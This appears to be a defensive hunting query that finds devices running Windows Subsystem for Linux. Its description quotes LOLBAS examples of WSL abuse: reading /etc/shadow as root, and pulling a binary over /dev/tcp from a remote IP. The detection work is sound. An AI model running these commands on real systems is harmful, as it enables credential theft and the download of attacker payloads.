Windows Subsystem for Linux may be used by adversaries to perform actions as root, or to download files. This query lists all devices that have WSL installed and it was active in the last 30 days. This may give an indidcation about the usage in your environment. Microsoft recommends listing WSL, if there is no scenario you explicitly require them. WSL Should be installed in the folder: C:\Windows\System32\wsl.exe. From the Lolbas project some suspicious queries that can be executed by WSL are:
wsl.exe -u root -e cat /etc/shadow
wsl.exe --system calc.exe
wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
- https://learn.microsoft.com/en-us/windows/wsl/
- https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/
- https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
let WSLDevices = DeviceProcessEvents
| where Timestamp > ago(30d)
| where FileName == "wsl.exe"
| distinct DeviceId;
DeviceInfo
| where DeviceId in (WSLDevices)
| summarize arg_max(Timestamp, *) by DeviceId